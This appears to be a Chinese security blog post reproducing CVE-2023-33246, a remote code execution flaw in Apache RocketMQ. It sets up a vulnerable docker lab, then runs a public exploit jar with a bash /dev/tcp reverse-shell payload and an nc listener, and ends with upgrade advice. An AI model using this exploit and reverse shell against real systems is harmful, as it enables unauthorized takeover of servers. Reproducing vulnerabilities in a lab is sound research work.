Apache
RocketMQ <= 5.1.0
Apache
RocketMQ <= 4.9.5
下载docker镜像:
docker
pull apache/rocketmq:4.9.1
docker
pull apacherocketmq/rocketmq-console:2.0.0
启动namesrv:
docker
run -d -p
9876
:
9876
-v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e
"MAX_POSSIBLE_HEAP=100000000"
apache/rocketmq:
4
.
9
.
1
sh mqnamesrv
启动broker服务(先创建并配置broker文件)
创建broker文件目录
mkdir -p /NDTSec/rocketmq/conf/
配置broker文件
vim /NDTSec/rocketmq/conf/broker.conf
将下面内容复制粘贴到broker.conf配置文件中:
brokerClusterName = DefaultCluster
brokerName = broker-a
brokerId =
0
deleteWhen =
04
fileReservedTime =
48
brokerRole = ASYNC_MASTER
flushDiskType = SYNC_FLUSH
docker
run -d -p
10911
:
10911
-p
10909
:
10909
-v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /NDTSec/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e
"NAMESRV_ADDR=namesrv:9876"
-e
"MAX_POSSIBLE_HEAP=200000000"
apache/rocketmq:
4
.
9
.
1
sh mqbroker -c /opt/rocketmq/conf/broker.conf
docker
run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv
-e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876
-Dcom.rocketmq.sendMessageWithVIPChannel=false"
-t apacherocketmq/rocketmq-console:2.0.0
环境搭建成功页面是这个酱紫
直接利用Github上大佬写好的工具反弹shell:
https://github.com/Serendipity-Lucky/CVE-2023-33246
java
-jar CVE-
2023
-
33246
.jar -ip
"1.1.1.1"
-cmd
"bash -i >& /dev/tcp/4.4.4.4/1122 0>&1"
PS:自己本地测试的时候,反弹shell的ip不能与docker启动环境的ip一样,不然接收不到shell
NC监听:
nc -lvnp 1122
目前官方已发布安全修复更新,受影响用户可以升级到 Apache RocketMQ
5.1
.1
或者
4.9
.6
建议及时更新至最新版本
原文始发于微信公众号(哪都通安全):叮~你有新的速递!CVE-2023-33246 RCE漏洞(附EXP)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论